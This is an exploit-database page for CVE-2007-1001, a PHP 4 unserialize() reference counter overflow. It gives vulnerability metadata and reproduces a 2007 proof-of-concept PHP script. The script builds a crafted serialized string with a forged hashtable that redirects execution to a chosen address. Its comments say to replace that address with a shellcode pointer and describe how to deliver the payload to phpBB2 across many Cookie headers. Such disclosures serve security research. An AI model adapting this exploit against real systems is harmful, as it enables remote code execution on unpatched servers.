header-logo
Suggest Exploit
vendor:
PHP
by:
Stefan Esser
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: PHP
Affected Version From: PHP 4
Affected Version To: PHP 4
Patch Exists: NO
Related CWE: CVE-2007-1001
CPE: a:php:php:4
Metasploit: https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2007-1001/https://www.rapid7.com/db/vulnerabilities/freebsd-vid-f5e52bf5-fc77-11db-8163-000e0c2e438a/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2007-1001/https://www.rapid7.com/db/vulnerabilities/suse-cve-2007-1001/https://www.rapid7.com/db/vulnerabilities/php-cve-2007-1001/https://www.rapid7.com/db/vulnerabilities/apple-osx-php-cve-2007-1001/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2007-0153/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2007-0155/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2007-0162/https://www.rapid7.com/db/vulnerabilities/linuxrpm-CESA-2007-0155/https://www.rapid7.com/db/vulnerabilities/linuxrpm-CESA-2007-0153/
Other Scripts:
Platforms Tested: Linux x86
2007

PHP 4 – unserialize() Reference Counter Overflow

This exploit takes advantage of a buffer overflow vulnerability in the unserialize() function in PHP 4. By manipulating the hashtable variable, an attacker can overwrite memory and execute arbitrary code. This specific exploit is designed for Linux x86 systems.

Mitigation:

Update to a version of PHP that is not affected by this vulnerability.
Source

Exploit-DB raw data:

<?php
  ////////////////////////////////////////////////////////////////////////
  //  _  _                _                     _       ___  _  _  ___  //
  // | || | __ _  _ _  __| | ___  _ _   ___  __| | ___ | _ \| || || _ \ //
  // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___||  _/| __ ||  _/ //
  // |_||_|\__,_||_|  \__,_|\___||_||_|\___|\__,_|     |_|  |_||_||_|   //
  //                                                                    //
  //         Proof of concept code from the Hardened-PHP Project        //
  //                   (C) Copyright 2007 Stefan Esser                  //
  //                                                                    //
  ////////////////////////////////////////////////////////////////////////
  //           PHP 4 - unserialize() Reference Counter Overflow         //
  ////////////////////////////////////////////////////////////////////////

  // This is meant as a protection against remote file inclusion.
  die("REMOVE THIS LINE");
  
  // This exploit is only designed for linux x86 systems
  // where 0x08064058 is a readable address in the PHP process 
  // (should be unless binary images are relocated default systems)
  // 
  // The exploit does nothing useful. It just proves that the CPU
  // will try to execute the instruction at 0x99887766 which results
  // in a crash. Just replace it with a pointer to your shellcode and
  // it will work.
  //
  // To exploit phpBB2 with this you need to put a similar string
  // into the cookie. You must work around the size limit of HTTP
  // headers by using MANY Cookie: headers (not folded lines, real
  // headers). Additionally you must put at the end of ever line
  // a line terminator s:2:" and start every following line with
  // ";N; of course with URL encoded ';'

  $hashtable = str_repeat("A", 39);
  
  $hashtable[5*4+0]=chr(0x58);
  $hashtable[5*4+1]=chr(0x40);
  $hashtable[5*4+2]=chr(0x06);
  $hashtable[5*4+3]=chr(0x08);
  
  $hashtable[8*4+0]=chr(0x66);
  $hashtable[8*4+1]=chr(0x77);
  $hashtable[8*4+2]=chr(0x88);
  $hashtable[8*4+3]=chr(0x99);

  $str = 'a:100000:{s:8:"AAAABBBB";a:3:{s:12:"0123456789AA";a:1:{s:12:"AAAABBBBCCCC";i:0;}s:12:"012345678AAA";i:0;s:12:"012345678BAN";i:0;}';
  for ($i=0; $i<65535; $i++) {
    $str .= 'i:0;R:2;';
  }
  $str .= 's:39:"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";s:39:"'.$hashtable.'";i:0;R:3;';

  unserialize($str);

?>

# milw0rm.com [2007-03-02]

Navigation

Suggest Exploit

Services By CQR